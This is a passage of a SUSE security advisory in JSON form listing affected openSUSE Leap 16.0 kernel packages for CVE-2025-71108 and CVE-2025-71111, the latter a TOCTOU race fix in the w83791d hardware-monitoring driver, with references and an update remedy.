"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71108"
},
{
"cve": "CVE-2025-71111",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71111"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nhwmon: (w83791d) Convert macros to functions to avoid TOCTOU\n\nThe macro FAN_FROM_REG evaluates its arguments multiple times. When used\nin lockless contexts involving shared driver data, this leads to\nTime-of-Check to Time-of-Use (TOCTOU) race conditions, potentially\ncausing divide-by-zero errors.\n\nConvert the macro to a static function. This guarantees that arguments\nare evaluated only once (pass-by-value), preventing the race\nconditions.\n\nAdditionally, in store_fan_div, move the calculation of the minimum\nlimit inside the update lock. This ensures that the read-modify-write\nsequence operates on consistent data.\n\nAdhere to the principle of minimal changes by only converting macros\nthat evaluate arguments multiple times and are used in lockless\ncontexts.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71111",
"url": "https://www.suse.com/security/cve/CVE-2025-71111"
},
{
"category": "external",
"summary": "SUSE Bug 1256728 for CVE-2025-71111",
"url": "https://bugzilla.suse.com/1256728"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
